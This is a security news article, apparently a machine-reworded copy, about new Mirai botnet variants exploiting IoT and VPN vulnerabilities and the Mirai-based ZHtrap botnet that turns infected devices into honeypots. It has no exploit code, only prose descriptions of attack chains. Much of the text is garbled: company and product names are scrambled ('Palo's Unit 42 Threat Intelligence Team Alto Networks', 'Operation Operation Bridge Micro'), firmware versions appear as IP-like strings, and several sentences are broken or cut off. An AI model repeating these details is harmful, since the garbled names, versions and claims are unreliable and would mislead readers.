Cybersecurity researchers on Monday unveiled a new wave of persistent attacks exploiting multiple vulnerabilities to deploy new Mirai variants on internet-connected devices.
“After being successfully exploited, the attackers attempt to download a malicious shell script, which includes further infection behaviors such as downloading and implementing Mirai variants and brute force enforcers,” said Palo’s Unit 42 Threat Intelligence Team Alto Networks in writing.
The rash of exploited vulnerabilities includes:
VisualDoor – SonicWall SSL-VPN remote command injection vulnerability that came to light earlier in January
CVE-2020-25506 – D-Link DNS-320 firewall remote code (RCE) vulnerability
CVE-2021-27561 and CVE-2021-27562 – Two Yealink Device Management vulnerabilities that allow an unmanaged attacker to run arbitrary commands on the server with root privileges
CVE-2021-22502 – RCE fault in Operation Operation Bridge Micro (OBR) Reporter, affecting version 10.40
CVE-2019-19356 – Netis WF2419 RCE wireless router takes advantage of, a
CVE-2020-26919 – Netgear ProSAFE Plus RCE vulnerability
“The VisualDoor exploitation in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 22.214.171.124-43sv and 126.96.36.199-25sv releases,” SonicWall said in a statement to The Hacker News . “It’s not viable against any properly patched SonicWall tools.”
Also included in the mix are three previously undisclosed command injection vulnerabilities used against unknown targets, one of which, according to the researchers, was seen in conjunction with a separate botnet called MooBot.
The attacks are said to have been detected over the course of a month starting from Feb. 16 to as recently as March 13.
Regardless of the flaws used for successful exploitation, the attack chain includes using wget utilities to download a shell script from the malicious software infrastructure that is then used to fetch Mirai binaries, a notorious malicious software that turns IoT devices into Their networking that runs Linux is remotely managed bots. it can be used as part of a botnet in large-scale network attacks.
Apart from downloading Mirai, additional shell scripts have been seen restoring executable actions to facilitate brute force attacks to break into fragile devices with weak passwords.
“The IoT domain remains an easy-to-reach target for attackers. Many vulnerabilities are very easy to exploit and could, in some cases, have disastrous consequences,” the researcher said.
New ZHtrap Botnet Traps Victims Using Honey Pot
In a related development, researchers from Chinese security firm Netlab 360 discovered a new Mirai-based botnet called ZHtrap that uses a honey pot to harvest additional victims, while borrowing some features from a DDoS botnet called Matryosh .
While honey pots typically mimic a target for cybercriminals to capitalize on their intervention efforts to glean more information about their modus operandi, the ZHtrap botnet uses a similar technique by integrating a scanning IP collection module for address collection IP used as targets. for further propagation similar to worms.
It achieves this by listening to 23 designated ports and identifying IP addresses that connect to these ports, then using the collected IP addresses to examine for four vulnerabilities to inject the payload –
“ZHtrap propagation uses four N-day vulnerabilities, the primary function being DDoS and scanning, while integrating some outdoor features,” the researchers said. “Zhtrap installs a honey pot on the infected device, [and] takes snapshots for the victim devices, and disables running new commands based on the snapshot, thereby achieving selectivity over the device. “
After it takes over the devices, ZHtrap takes a cue from Matryosh’s botnet by using Tor for command and control server communications to download and execute additional payloads.
Noting that the attacks began from February 28, 2021, the researchers said that ZHtrap’s ability to turn infected devices into honey pots marked the “interesting” evolution of botnets to facilitate finding more targets.
These Mirai-based botnets are the latest to emerge on the threat landscape, in part due to the availability of Mirai source code on the Internet since 2016, opening the field open for other attackers to build their own variants .
In March last year, researchers discovered a Mirai variant called “Mukashi,” which was found targeting Zyxel network-connected storage devices (NAS) for consignment into a botnet. Then in October 2020, Avira’s IoT research team identified another variant of the Mirai botnet called “Katana,” which took advantage of remote code execution vulnerabilities to infect D-Link DSL-7740C routers, DOCSIS 3.1 wireless gateway devices, and Dell PowerConnect 6224 switches.